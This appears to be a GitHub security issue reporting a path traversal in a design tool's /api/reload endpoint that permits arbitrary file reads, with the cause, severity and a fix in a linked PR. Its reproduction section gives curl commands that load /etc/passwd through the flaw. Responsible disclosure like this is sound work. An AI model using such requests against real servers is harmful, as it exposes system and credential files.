[Security] design serve /api/reload path traversal — arbitrary file read

## Summary

`design/src/serve.ts:177-186` — The `/api/reload` endpoint reads `body.html` from the POST request body and passes it directly to `fs.readFileSync()` with only an `existsSync()` check. Any file readable by the process can be served as HTML through the `/` endpoint.

## Reproduction

```bash
# Start the design serve command
$D serve /path/to/board.html

# From another terminal, reload with an arbitrary path
curl -X POST http://127.0.0.1:<port>/api/reload \
  -H 'Content-Type: application/json' \
  -d '{"html": "/etc/passwd"}'

# Then fetch the served page — contains /etc/passwd content
curl http://127.0.0.1:<port>/
```

## Severity

High — arbitrary file read via localhost HTTP server.

## Fix

PR #664 anchors all file reads to the initial HTML file's parent directory using `realpathSync`, blocking symlink and traversal attacks. 3 integration tests added.

Found via sqry AST-based semantic code graph analysis.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] design serve /api/reload path traversal — arbitrary file read #672

Summary

Reproduction

Severity

Fix

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

[Security] design serve /api/reload path traversal — arbitrary file read #672

Description

Summary

Reproduction

Severity

Fix

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions